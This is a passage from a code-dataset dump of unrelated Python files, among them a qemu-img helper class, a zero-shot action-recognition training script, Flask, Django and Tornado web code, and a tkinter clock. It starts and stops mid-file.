interpolation=cv2.INTER_AREA)\n\n\ndata_x_train = dataO[:1200, ...]\ndata_x_test = dataO[1200:, ...]\n\nplt.figure()\nplt.axis(\"off\")\nplt.imshow(dataO[245])\n\n\n## VERSION 3\n\nimport os, sys\nimport glob\n#import cPickle as pkl\nimport numpy as np\nimport PIL.Image as Image\nfrom skimage.transform import resize\n\n#img = Image.open(\"/home/nick/Documents/data/elephants/n02504013_1673.JPEG\")\n#img.show()\n\ndef resize_images():\n # From IFT6266 2017 Project \n \n ### PATH need to be fixed\n data_path=\"/home/nick/Documents/data/elephants/\"\n save_dir = \"/home/nick/Documents/data/elephants_crop/\"\n\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n preserve_ratio = True\n image_size = (64, 64)\n\n imgs = glob.glob(data_path+\"/*.JPEG\")\n\n\n for i, img_path in enumerate(imgs):\n img = Image.open(img_path)\n print(i, len(imgs), img_path)\n\n if img.size[0] != image_size[0] or img.size[1] != image_size[1] :\n if not preserve_ratio:\n img = img.resize((image_size), Image.ANTIALIAS)\n else:\n ### Resize based on the smallest dimension\n scale = image_size[0] / float(np.min(img.size))\n new_size = (int(np.floor(scale * img.size[0]))+1, int(np.floor(scale * img.size[1])+1))\n img = img.resize((new_size), Image.ANTIALIAS)\n\n img.save(save_dir + os.path.basename(img_path))\n \n \nimg = Image.open(\"/home/nick/Documents/data/elephants/n02504013_1673.JPEG\")\nimg.show()","sub_path":"ToyProjects/elephants_loadingdata.py","file_name":"elephants_loadingdata.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"520459023","text":"import constants\nfrom flask import Flask, render_template, request\nfrom instagram import client, subscriptions\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n unauthenticated_api = client.InstagramAPI(**constants.TEST_CONFIG)\n url = unauthenticated_api.get_authorize_url()\n\n return render_template('index.html', url=url)\n\n@app.route('/photos')\ndef photos():\n unauthenticated_api = client.InstagramAPI(**constants.TEST_CONFIG)\n code = request.args['code']\n try:\n access_token, user_info = unauthenticated_api.exchange_code_for_access_token(code)\n except TypeError:\n return True\n\n api = client.InstagramAPI(access_token=access_token)\n user = api.user().full_name\n media, _ = api.user_recent_media(count=-1)\n pictures = []\n most_liked_sorted = []\n for pic in media:\n new_img = {\n 'title': pic.location.name,\n 'url': pic.images['low_resolution'].url,\n 'lat': pic.location.point.latitude,\n 'lng': pic.location.point.longitude,\n 'likes': pic.like_count\n }\n pictures.append(new_img)\n\n most_liked = sorted(pictures, key=lambda k: k['likes'], reverse=True)\n return render_template('photos.html', pictures=pictures, user=user, most_liked=most_liked[0:11])\n\n@app.errorhandler(500)\ndef internal_error(error):\n\n return error\n\nif __name__ == \"__main__\":\n app.run()","sub_path":"brendancom.py","file_name":"brendancom.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479592418","text":"import pickle\n\ngraph = pickle.load(open('val_graph2.p', 'rb'))\n\nnew_graph = {}\n\nGENDER_NEUTRAL_NAMES = ['Casey', 'Riley', 'Jessie', 'Jackie', 'Avery', 'Jaime', 'Peyton', 'Kerry', 'Jody', 'Kendall',\n 'Peyton', 'Skyler', 'Frankie', 'Pat', 'Quinn',\n ]\n\nfor img in graph.keys():\n relas = graph[img]\n sentence = []\n\n for rela in relas:\n rela = rela.strip().split()\n for word in rela:\n if word in GENDER_NEUTRAL_NAMES:\n obj_index = GENDER_NEUTRAL_NAMES.index(word)\n sentence.append(f'[{obj_index}]')\n else:\n sentence.append(word)\n sentence.append('&')\n new_graph[img] = sentence[:-1]\n\noutfile = open('val_relation.p','wb')\npickle.dump(new_graph, outfile)\noutfile.close()","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"129100949","text":"from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom . import views\n\napp_name = 'sns'\nurlpatterns = [\n path('', views.timeline, name='timeline'),\n path('/', views.userpage, name='userpage'),\n path('//', views.detail, name='detail'),\n path('//delete_confirm/', views.delete_confirm, name='delete_confirm'),\n path('//delete/', views.delete, name='delete'),\n path('//reply/', views.reply, name='reply'),\n path('//good/', views.good, name='good'),\n path('post/', views.post, name='post'),\n path('edit/', views.edit, name='edit'),\n path('create_account/', views.create_account, name='create_account'),\n path('account_login/', views.account_login, name='login'),\n path('logout/', views.Logout.as_view(), name='logout'),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"sns/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"412176995","text":"from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.autograd as autograd\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport math\nimport util \nimport classifier2 as classifier\nimport classifier_entropy\nimport my_model as model\nimport numpy as np\nfrom model import MLP_G\nfrom eval import *\nimport selector\n\nparser = argparse.ArgumentParser(\"GZSL Action\")\nparser.add_argument('--dataset', default='hmdb51', help='Dataset name')\nparser.add_argument('--dataroot', default='data_action/', help='path to dataset')\nparser.add_argument('--matdataset', default=True, help='Data in matlab format')\nparser.add_argument('--action_embedding', default='i3d')\nparser.add_argument('--class_embedding', default='att')\nparser.add_argument('--split', type=int, default=1)\nparser.add_argument('--syn_num', type=int, default=100, help='number features to generate per class')\nparser.add_argument('--gzsl', action='store_true', default=False, help='enable generalized zero-shot learning')\nparser.add_argument('--gzsl_od', action='store_true', default=False, help='enable out-of-distribution based generalized zero-shot learning')\nparser.add_argument('--preprocessing', action='store_true', default=False, help='enbale MinMaxScaler on visual features')\nparser.add_argument('--standardization', action='store_true', default=False)\nparser.add_argument('--validation', action='store_true', default=False, help='enable cross validation mode')\nparser.add_argument('--workers', type=int, help='number of data loading workers', default=2)\nparser.add_argument('--batch_size', type=int, default=64, help='input batch size')\nparser.add_argument('--resSize', type=int, default=4096, help='size of visual features')\nparser.add_argument('--attSize', type=int, default=300, help='size of semantic features')\nparser.add_argument('--nz', type=int, default=256, help='size of the latent z vector')\nparser.add_argument('--ngh', type=int, default=4096, help='size of the hidden units in generator')\nparser.add_argument('--ndh', type=int, default=4096, help='size of the hidden units in discriminator')\nparser.add_argument('--nepoch', type=int, default=50, help='number of epochs to train for')\nparser.add_argument('--critic_iter', type=int, default=5, help='critic iteration, following WGAN-GP')\nparser.add_argument('--lambda1', type=float, default=10, help='gradient penalty regularizer, following WGAN-GP')\nparser.add_argument('--cosem_weight', type=float, default=0.1, help='weight of the cos embed loss')\nparser.add_argument('--recons_weight', type=float, default=0.01, help='recons_weight for decoder')\nparser.add_argument('--lr', type=float, default=0.0001, help='learning rate to train GANs')\nparser.add_argument('--beta1', type=float, default=0.5, help='beta1 for adam. default=0.5')\nparser.add_argument('--cuda', action='store_true', default=False, help='enables cuda')\nparser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')\nparser.add_argument('--netG', default='', help=\"path to netG (to continue training)\")\nparser.add_argument('--netD', default='', help=\"path to netD (to continue training)\")\nparser.add_argument('--netDec', default='', help=\"path to netDec (to continue training)\")\nparser.add_argument('--netG_name', default='')\nparser.add_argument('--netD_name', default='')\nparser.add_argument('--start_epoch', type=int, default=0)\nparser.add_argument('--manualSeed', type=int, help='manual seed')\nparser.add_argument('--nclass_all', type=int, default=200, help='number of all classes')\n\nparser.add_argument('--use_gan', type=bool, default=False, help='use gan to generate')\nparser.add_argument('--use_od', type=bool, default=False, help='use gan to generate')\nparser.add_argument('--use_train', type=bool, default=False, help='use gan to generate')\n\nopt = parser.parse_args()\nprint(opt)\n\ndef generate_syn_feature(netG, classes, attribute, num):\n # generate num synthetic samples for each class in classes\n nclass = classes.size(0)\n syn_feature = torch.FloatTensor(nclass*num, opt.resSize)\n syn_label = torch.LongTensor(nclass*num) \n syn_att = torch.FloatTensor(num, opt.attSize)\n syn_noise = torch.FloatTensor(num, opt.nz)\n\n if opt.cuda:\n syn_att = syn_att.cuda()\n syn_noise = syn_noise.cuda()\n\n\n for i in range(nclass):\n iclass = classes[i]\n iclass_att = attribute[iclass]\n syn_att.copy_(iclass_att.repeat(num, 1))\n syn_noise.normal_(0, 1)\n with torch.no_grad():\n output = netG(Variable(syn_noise), Variable(syn_att))\n syn_feature.narrow(0, i*num, num).copy_(output.data.cpu())\n syn_label.narrow(0, i*num, num).fill_(iclass)\n \n return syn_feature, syn_label\n\n\nif opt.manualSeed is None:\n opt.manualSeed = random.randint(1, 10000)\nprint(\"Random Seed: \", opt.manualSeed)\nrandom.seed(opt.manualSeed)\ntorch.manual_seed(opt.manualSeed)\nif opt.cuda:\n torch.cuda.manual_seed_all(opt.manualSeed)\n\ncudnn.benchmark = True\n\nif torch.cuda.is_available() and not opt.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\n# load data\ndata = util.DATA_LOADER(opt)\nprint(\"# of training samples: \", data.ntrain)\n\n# initialize generator, discriminator and decoder\nnetVA = model.Encode_Vis_Att(opt)\nnetAV = model.Decode_Att_Vis(opt)\n# print nets\nprint(netVA)\nprint(netAV)\n\n##############################\nnetG = MLP_G(opt).cuda()\nnetG.load_state_dict(torch.load(\"netG.tar\")['state_dict'].state_dict())\nsyn_feature, syn_label = generate_syn_feature(netG, data.unseenclasses, data.attribute, opt.syn_num)\nseen_class = data.seenclasses.size(0)\nif opt.use_od:\n netOD = selector.ODDetector(data.train_feature.size(1), 512, seen_class).cuda()\n netOD.load_state_dict(torch.load(\"netOD.tar\")['state_dict'])\n od_seen_thresh = torch.load(\"netOD.tar\")['seen_thresh']\n od_unseen_thresh = torch.load(\"netOD.tar\")['unseen_thresh']\n od_thresh = 0.1\n #od_thresh = (od_unseen_thresh - od_seen_thresh) / 2\n #print(od_thresh)\n\n #netOD = selector.CLASSIFIER(data.train_feature, util.map_label(data.train_label, data.seenclasses), data, seen_class, syn_feature, syn_label, opt.cuda, _batch_size=128)\n #od_seen_thresh = netOD.thresh\n #od_unseen_thresh = netOD.unseen_thresh\n #netOD = netOD.model\n #torch.save({'state_dict':netOD.state_dict(), 'seen_thresh':od_seen_thresh, 'unseen_thresh':od_unseen_thresh}, 'netOD.tar')\n\nopt.num_seen = len(data.train_feature)\nif opt.use_gan:\n data.train_feature = torch.cat((data.train_feature, syn_feature), dim = 0)\n data.train_label = torch.cat((data.train_label, syn_label), dim = 0)\n\n##############################\n\nemb_criterion = nn.CosineEmbeddingLoss(margin=0)\nrecons_criterion = nn.MSELoss()\n# recons_criterion = nn.L1Loss() # L1 loss \n\ninput_res = torch.FloatTensor(opt.batch_size, opt.resSize)\ninput_att = torch.FloatTensor(opt.batch_size, opt.attSize)\ninput_label = torch.LongTensor(opt.batch_size)\nnoise = torch.FloatTensor(opt.batch_size, opt.nz)\none = torch.FloatTensor([1])\nmone = one * -1\n\nif opt.cuda:\n netVA.cuda()\n netAV.cuda()\n input_res, input_label = input_res.cuda(), input_label.cuda()\n noise, input_att = noise.cuda(), input_att.cuda()\n one = one.cuda()\n mone = mone.cuda()\n emb_criterion.cuda()\n recons_criterion.cuda()\n \ndef sample():\n # Sample a batch\n batch_feature, batch_label, batch_att = data.next_batch(opt.batch_size)\n if batch_feature.size(1) > opt.resSize:\n batch_feature = batch_feature[:, 0:opt.resSize]\n input_res.copy_(batch_feature)\n input_att.copy_(batch_att)\n input_label.copy_(util.map_label(batch_label, data.seenclasses))\n\n\ndef calc_gradient_penalty(netD, real_data, fake_data, input_att):\n # Gradient penalty of WGAN\n alpha = torch.rand(opt.batch_size, 1)\n alpha = alpha.expand(real_data.size())\n if opt.cuda:\n alpha = alpha.cuda()\n\n interpolates = alpha * real_data + ((1 - alpha) * fake_data)\n\n if opt.cuda:\n interpolates = interpolates.cuda()\n\n interpolates = Variable(interpolates, requires_grad=True)\n\n disc_interpolates = netD(interpolates, Variable(input_att))\n\n ones = torch.ones(disc_interpolates.size())\n if opt.cuda:\n ones = ones.cuda()\n\n gradients = autograd.grad(outputs=disc_interpolates, inputs=interpolates,\n grad_outputs=ones,\n create_graph=True, retain_graph=True, only_inputs=True)[0]\n\n gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * opt.lambda1\n return gradient_penalty\n\n\n# setup optimizer\noptimizerVA = optim.Adam(netVA.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\noptimizerAV = optim.Adam(netAV.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n \n# Start training\nfor epoch in range(opt.nepoch):\n # set to training mode\n netVA.train()\n netAV.train()\n\n mean_lossAV, mean_lossVA = 0, 0\n mean_lossM = 0 \n for i in range(0, data.ntrain, opt.batch_size):\n ############################\n # (1) Update Vis to Att\n ###########################\n for p in netVA.parameters(): # reset requires_grad\n p.requires_grad = True # they are set to False below in netG update\n for p in netAV.parameters(): # reset requires_grad\n p.requires_grad = False # they are set to False below in netG update\n\n for iter_d in range(opt.critic_iter):\n sample()\n netVA.zero_grad()\n # train with realG, sample a mini-batch\n input_resv = Variable(input_res) #I3D feature\n input_attv = Variable(input_att) #semantic attribute\n \n recons_a, mix_f_a = netVA(input_resv) #reconstruct semantic attribute\n VA_cost = recons_criterion(recons_a, input_attv)\n\n VA_cost.backward()\n optimizerVA.step()\n mean_lossVA += VA_cost.item()\n\n \n ###########################\n # (2) Update Att to Vis\n ###########################\n for p in netVA.parameters(): # reset requires_grad\n p.requires_grad = False # avoid computation\n for p in netAV.parameters(): # reset requires_grad\n p.requires_grad = True # avoid computation\n for iter_d in range(opt.critic_iter):\n sample()\n netAV.zero_grad()\n # train with realG, sample a mini-batch\n input_resv = Variable(input_res) #I3D feature\n input_attv = Variable(input_att) #semantic attribute\n \n # Decoder training\n recons_v, mix_f_v = netAV(input_attv) #reconstruct semantic attribute\n AV_cost = recons_criterion(recons_v, input_resv)\n AV_cost.backward()\n optimizerAV.step()\n mean_lossAV += AV_cost.item()\n \n ###########################\n # (2) Update Mix Domain\n ###########################\n\n for p in netVA.parameters(): # reset requires_grad\n p.requires_grad = True # avoid computation\n for p in netAV.parameters(): # reset requires_grad\n p.requires_grad = True # avoid computation\n\n for iter_d in range(opt.critic_iter):\n sample()\n netAV.zero_grad()\n netVA.zero_grad()\n # train with realG, sample a mini-batch\n input_resv = Variable(input_res) #I3D feature\n input_attv = Variable(input_att) #semantic attribute\n \n # Decoder training\n recons_v, mix_f_v = netAV(input_attv) #reconstruct semantic attribute\n recons_a, mix_f_a = netVA(input_resv) #reconstruct semantic attribute\n M_cost = recons_criterion(mix_f_v, mix_f_a)\n\n M_cost.backward()\n optimizerAV.step()\n optimizerVA.step()\n mean_lossM += M_cost.item()\n\n\n \n mean_lossVA /= opt.critic_iter * data.ntrain / opt.batch_size \n mean_lossAV /= opt.critic_iter * data.ntrain / opt.batch_size\n mean_lossM /= data.ntrain / opt.batch_size\n \n print('[%d/%d] Loss_VA: %.4f Loss_AV: %.4f, Loss_M: %.4f' % (epoch, opt.nepoch, mean_lossVA, mean_lossAV, mean_lossM))\n\n\n ##########eval_unseen#########\n\n if opt.use_od:\n seen_acc, unseen_acc, H, total_acc, seen_od, unseen_od, total_od_acc = eval_od(netAV, netVA, netOD, od_thresh, data, opt)\n print('Test with OD [%d/%d]: Unseen: %.4f, Seen: %4f, H: %4f, Total: %4f' % (epoch, opt.nepoch, unseen_acc, seen_acc, H, total_acc))\n print('Test with OD [%d/%d]: Unseen_od: %.4f, Seen_od: %4f, Total_od: %4f' % (epoch, opt.nepoch, unseen_od, seen_od, total_od_acc))\n else:\n total_acc, seen_acc, unseen_acc = eval_gzsl(netAV, netVA, data, opt)\n eps = 1e-12\n H = 2*seen_acc*unseen_acc / (seen_acc + unseen_acc + eps)\n print('Test [%d/%d]: Unseen: %.4f, Seen: %4f, H: %4f, Mix: %4f' % (epoch, opt.nepoch, unseen_acc, seen_acc, H, total_acc))\n\n\n \n","sub_path":"online_action_ucf/my_action_gan_od.py","file_name":"my_action_gan_od.py","file_ext":"py","file_size_in_byte":13045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"95659899","text":"# coding: utf-8\n\nfrom .Sale import Sale\nfrom .Tree import Tree\n\nclass Main:\n\n #Padrão de entrada da data: YYYY_MM (Ex: 2017_02)\n def __init__(self):\n self.treeFilial = Tree()\n self.treeDate = Tree()\n\n self.load_file('vendas.txt')\n self.search(min_filial=10, max_filial=20, min_date='2017_01', max_date='2017_06')\n\n def load_file(self, path):\n file = open(path,'r')\n lines = file.readlines()\n\n id = 1\n for line in lines:\n line_list = line.split(',')\n sale = Sale(id,line_list[0],line_list[1],line_list[2],line_list[3])\n self.treeFilial.add(sale, key='filial')\n self.treeDate.add(sale, key=\"date\")\n id +=1\n\n def search(self, min_filial=None, max_filial=None, min_date=None, max_date=None):\n if min_date is None and max_date is None: flag = 1\n elif min_filial is None and max_filial is None: flag =2\n else: flag = 3\n\n nodes_date, nodes_filial = None,None\n\n if flag != 1:\n print(\"Árvore Data\")\n self.treeDate.print_tree(key='date')\n nodes_date = self.treeDate.search_range(min_date,max_date)\n print(('Total de vendas de todas as filias com data entre {} e {}:'.format(min_date, max_date), self.treeFilial.sum_sales(dates=nodes_date)))\n\n if flag != 2:\n print(\"\\n\\nArvore Filial\")\n self.treeFilial.print_tree(key='filial')\n nodes_filial = self.treeFilial.search_range(min_filial, max_filial)\n print(('Total vendas das filiais {} e {}:'.format(min_filial, max_filial), self.treeFilial.sum_sales(filials=nodes_filial)))\n\n if flag ==3:\n sum_sales = Tree.sum_sales(nodes_filial, nodes_date)\n print((\"\\nTotal de vendas das filiais {} e {} entre os meses de {} e {}:\".format(min_filial,max_filial, min_date, max_date), sum_sales))\n\n\n\n\nif __name__ == \"__main__\":\n program = Main()\n","sub_path":"TIC10002-Py/src/uff/ic/lleme/tic10002/trabalhos/s20171/Adriel_Araujo/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"19932764","text":"#!/usr/bin/env python\n#\n# qemu_img.py - Helper for 'qemu-img'\n#\n# February 2015, Glenn F. Matthews\n# Copyright (c) 2013-2015 the COT project developers.\n# See the COPYRIGHT.txt file at the top-level directory of this distribution\n# and at https://github.com/glennmatthews/cot/blob/master/COPYRIGHT.txt.\n#\n# This file is part of the Common OVF Tool (COT) project.\n# It is subject to the license terms in the LICENSE.txt file found in the\n# top-level directory of this distribution and at\n# https://github.com/glennmatthews/cot/blob/master/LICENSE.txt. No part\n# of COT, including this file, may be copied, modified, propagated, or\n# distributed except according to the terms contained in the LICENSE.txt file.\n\n\"\"\"Give COT access to ``qemu-img`` for manipulating disk image formats.\n\nhttp://www.qemu.org\n\"\"\"\n\nimport logging\nimport os.path\nimport re\nfrom distutils.version import StrictVersion\n\nfrom .helper import Helper\n\nlogger = logging.getLogger(__name__)\n\n\nclass QEMUImg(Helper):\n \"\"\"Helper provider for ``qemu-img`` (http://www.qemu.org).\n\n **Methods**\n\n .. autosummary::\n :nosignatures:\n\n install_helper\n get_disk_format\n get_disk_capacity\n convert_disk_image\n create_blank_disk\n \"\"\"\n\n def __init__(self):\n \"\"\"Initializer.\"\"\"\n super(QEMUImg, self).__init__(\n \"qemu-img\",\n version_regexp=\"qemu-img version ([0-9.]+)\")\n self.vmdktool = None\n\n def install_helper(self):\n \"\"\"Install ``qemu-img``.\"\"\"\n if self.path:\n logger.warning(\"Tried to install {0} -- \"\n \"but it's already available at {1}!\"\n .format(self.name, self.path))\n return\n logger.info(\"Installing 'qemu-img'...\")\n if not (Helper.apt_install('qemu-utils') or\n Helper.port_install('qemu') or\n Helper.yum_install('qemu-img')):\n raise NotImplementedError(\n \"Unsure how to install qemu-img.\\n\"\n \"See http://en.wikibooks.org/wiki/QEMU/Installing_QEMU\")\n logger.info(\"Successfully installed 'qemu-img'.\")\n\n def get_disk_format(self, file_path):\n \"\"\"Get the major disk image format of the given file.\n\n .. warning::\n If :attr:`file_path` refers to a file which is not a disk image at\n all, this function will return ``'raw'``.\n\n :param str file_path: Path to disk image file to inspect.\n :return: Disk image format (``'vmdk'``, ``'raw'``, ``'qcow2'``, etc.)\n \"\"\"\n output = self.call_helper(['info', file_path])\n # Read the format from the output\n match = re.search(\"file format: (\\S*)\", output)\n if not match:\n raise RuntimeError(\"Did not find file format string in \"\n \"the output from qemu-img:\\n{0}\"\n .format(output))\n file_format = match.group(1)\n logger.info(\"File format of '{0}' is '{1}'\"\n .format(os.path.basename(file_path), file_format))\n return file_format\n\n def get_disk_capacity(self, file_path):\n \"\"\"Get the storage capacity of the given disk image.\n\n :param str file_path: Path to disk image file to inspect\n :return: Disk capacity, in bytes\n \"\"\"\n output = self.call_helper(['info', file_path])\n match = re.search(r\"(\\d+) bytes\", output)\n if not match:\n raise RuntimeError(\"Did not find byte count in the output from \"\n \"qemu-img:\\n{0}\"\n .format(output))\n capacity = match.group(1)\n logger.verbose(\"Disk {0} capacity is {1} bytes\".format(file_path,\n capacity))\n return capacity\n\n def convert_disk_image(self, file_path, output_dir,\n new_format, new_subformat=None):\n \"\"\"Convert the given disk image to the requested format/subformat.\n\n If the disk is already in this format then it is unchanged;\n otherwise, will convert to a new disk in the specified output_dir\n and return its path.\n\n Current supported conversions:\n\n * .vmdk (any format) to .vmdk (streamOptimized)\n * .img to .vmdk (streamOptimized)\n\n :param str file_path: Disk image file to inspect/convert\n :param str output_dir: Directory to place converted image into, if\n needed\n :param str new_format: Desired final format\n :param str new_subformat: Desired final subformat\n :return:\n * :attr:`file_path`, if no conversion was required\n * or a file path in :attr:`output_dir` containing the converted image\n\n :raise NotImplementedError: if the :attr:`new_format` and/or\n :attr:`new_subformat` are not supported conversion targets.\n \"\"\"\n file_name = os.path.basename(file_path)\n (file_string, file_extension) = os.path.splitext(file_name)\n\n new_file_path = None\n if new_format == 'raw':\n new_file_path = os.path.join(output_dir, file_string + '.img')\n logger.info(\"Invoking qemu-img to convert {0} into raw image {1}\"\n .format(file_path, new_file_path))\n self.call_helper(['convert', '-O', 'raw',\n file_path, new_file_path])\n elif new_format == 'vmdk' and new_subformat == 'streamOptimized':\n if self.version >= StrictVersion(\"2.1.0\"):\n new_file_path = os.path.join(output_dir, file_string + '.vmdk')\n # qemu-img finally supports streamOptimized - yay!\n logger.info(\"Invoking qemu-img to convert {0} to \"\n \"streamOptimized VMDK {1}\"\n .format(file_path, new_file_path))\n self.call_helper(['convert', '-O', 'vmdk',\n '-o', 'subformat=streamOptimized',\n file_path, new_file_path])\n else:\n raise NotImplementedError(\"qemu-img is unable to convert to \"\n \"stream-optimized VMDK format prior \"\n \"to version 2.1.0 - you have {0}\"\n .format(self.version))\n else:\n raise NotImplementedError(\"No support for converting disk image \"\n \"to format {0} / subformat {1}\"\n .format(new_format, new_subformat))\n\n return new_file_path\n\n def create_blank_disk(self, file_path, capacity, file_format=None):\n \"\"\"Create an unformatted disk image at the requested location.\n\n :param str file_path: Desired location of new disk image\n :param capacity: Disk capacity. A string like '16M' or '1G'.\n :param str file_format: Desired image format (if not specified, this\n will be derived from the file extension of :attr:`file_path`)\n \"\"\"\n if not file_format:\n # Guess format from file extension\n file_format = os.path.splitext(file_path)[1][1:]\n if not file_format:\n raise RuntimeError(\n \"Unable to guess file format from desired filename {0}\"\n .format(file_path))\n if file_format == 'img':\n file_format = 'raw'\n logger.debug(\"Guessed file format is {0}\".format(file_format))\n\n logger.info(\"Calling qemu-img to create {0} {1} image\"\n .format(capacity, file_format))\n self.call_helper(['create', '-f', file_format,\n file_path, capacity])\n","sub_path":"COT/helpers/qemu_img.py","file_name":"qemu_img.py","file_ext":"py","file_size_in_byte":7763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"292855456","text":"from tkinter import *\nimport sys\nimport time\n\ndef getTime():\n currentTime = time.strftime(\"%H:%M:%S\")\n getTimeLabel.config(text=currentTime)\n getTimeLabel.after(200, getTime)\n\nroot = Tk()\nroot.geometry(\"500x250\")\nroot.title(\"Welcome to Digital Clock\")\nroot.wm_iconbitmap(\"clk.ico\")\n\n##making the different labels for our program\nwelcomeLabel = Label(root, text=\"Digital Clock\", font=(\"Arial\", 30, \"bold\"), padx=25, pady=15)\ngetTimeLabel = Label(root, font=(\"Arial\", 30, \"bold\"), bg=\"white\", foreground=\"green\", pady=25, padx=100)\n## we need to call our function now which will give us the time \ngetTime() \nhmsLabel = Label(root, text=\"hrs min sec\", font=(\"Arial\", 15, \"bold\"))\n\n##placing order of different labels using Pack Manager\nwelcomeLabel.pack()\ngetTimeLabel.pack()\nhmsLabel.pack()\n\nroot.mainloop()\n","sub_path":"digital_clock_with_tkinter/mainClock.py","file_name":"mainClock.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"60919585","text":"\n# This is a filesystem watchdog responsible for writing from icecast/icegenerator log file to a database.\n# Every time the log file changes, icecast log file is the only place where the song history is stored.\n\n\nfrom datetime import datetime as dt\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nfrom application.models import db, RecordDB\nfrom application.parser import get_last_n_records, parse_record\nfrom application import create_app\n\napp = create_app()\n\nif not app.config[\"OS\"] == \"Windows_NT\":\n class MyHandler(FileSystemEventHandler):\n \"\"\" Class monotoring log file from Icecast server. \"\"\"\n\n def on_modified(self, event):\n \"\"\" Append currently played song to a database. \"\"\"\n if event.event_type == \"modified\" and event.src_path == app.config[\"LINUX_LOG_PATH\"]:\n title, artist, album, started_at = parse_record(get_last_n_records())\n with app.app_context():\n try:\n record = RecordDB(title=title,\n artist=artist,\n album=album,\n started_at=started_at,\n added_at=dt.now())\n db.session.add(record)\n db.session.commit()\n except Exception as e:\n print(e)\n\n def notify():\n \"\"\" Get notified when the Icecast log changes. \"\"\"\n event_handler = MyHandler()\n observer = Observer()\n observer.schedule(event_handler, path=\"/var/log/icecast/\", recursive=False)\n observer.start()","sub_path":"application/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"102984989","text":"\nimport tornado.ioloop\nimport tornado.web\nimport tornado.gen\nimport tornado.websocket\n\nimport os.path\nimport sys\nimport math\nimport time\n\nimport logging\n\ngDir_root = os.path.dirname(__file__)\ngDir_ui_static = os.path.join(gDir_root, 'ui/static')\n\nsys.path.insert(0, os.path.abspath(os.path.join(gDir_root, 'code')))\n\nimport ktsrv\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\nclass MainHandler(tornado.web.RequestHandler):\n\tdef initialize(self, code_entry):\n\t\tself.code_entry = code_entry\n\n\tdef get(self):\n\t\tpath_pref = None\n\t\tpath_file = os.path.basename(self.request.path)\n\t\tif self.code_entry == 'home':\n\t\t\treturn self.render('index.html')\n\t\telif self.code_entry == 'views':\n\t\t\tpath_pref = 'views'\n\t\t_js_ver = math.floor(time.time() * 1000)\n\t\treturn self.render(os.path.join(path_pref, path_file),\n\t\t\t\t\t\t\t\tdev_js_ver=_js_ver)\n\nclass HomeHandler(tornado.web.StaticFileHandler):\n\tdef validate_absolute_path(self, root, absolute_path):\n\t\tif self.request.uri == '/':\n\t\t\tabsolute_path = os.path.join(absolute_path, \"html\")\n\t\t#print(\"HomeHandler: root=\" + root + \", absolute_path=\" + absolute_path + \", request=\" + str(self.request))\n\t\treturn super(HomeHandler, self).validate_absolute_path(root, absolute_path)\n\nclass DemoHandler(tornado.web.RequestHandler):\n\tdef get(self):\n\t\tpath_file = os.path.basename(self.request.path)\n\t\treturn self.render(path_file)\n\n\tdef get_template_path(self):\n\t\treturn os.path.join(gDir_root, 'demo/html')\n\nclass MiscHandler(tornado.web.StaticFileHandler):\n\tdef validate_absolute_path(self, root, absolute_path):\n\t\tpath_file = os.path.basename(self.request.path)\n\t\t#print(\"MiscHandler: root=\" + root + \", absolute_path=\" + absolute_path + \", request=\" + str(self.request))\n\t\tif os.path.isfile(os.path.join(gDir_root, 'code/js', path_file)):\n\t\t\treturn os.path.join(gDir_root, 'code/js', path_file)\n\t\treturn super(MiscHandler, self).validate_absolute_path(root, absolute_path)\n\nclass AppChartServer(tornado.web.Application):\n\tdef __init__(self):\n\t\tsettings = dict(\n\t\t\tdebug=True,\n\t\t\ttemplate_path=os.path.join(gDir_root, 'ui/templates'),\n\t\t\tstatic_path=os.path.join(gDir_root, 'ui/static'),\n\t\t)\n\t\thandlers = [\n\t\t\t(r'/views/.*\\.html', MainHandler, { 'code_entry': 'views', }),\n\t\t\t(r'/demo/.*\\.html', DemoHandler),\n\t\t\t(r'/ws/(.*)', ktsrv.WebSockHandler),\n\t\t\t(r'/(css/.+\\.css)', MiscHandler, { 'path': settings['static_path'] }),\n\t\t\t(r'/(js/.+\\.js)', MiscHandler, { 'path': settings['static_path'] }),\n\t\t\t(r'/(favicon.ico)', MiscHandler, { 'path': settings['static_path'] }),\n\t\t\t(r'/()', HomeHandler, { 'path': 'ui/static', 'default_filename': 'index.html', }),\n\t\t]\n\t\tsuper(AppChartServer, self).__init__(handlers, **settings)\n\ndef main():\n\tapp = AppChartServer()\n\tapp.listen(8888)\n\ttornado.ioloop.IOLoop.current().start()\n\nif __name__ == 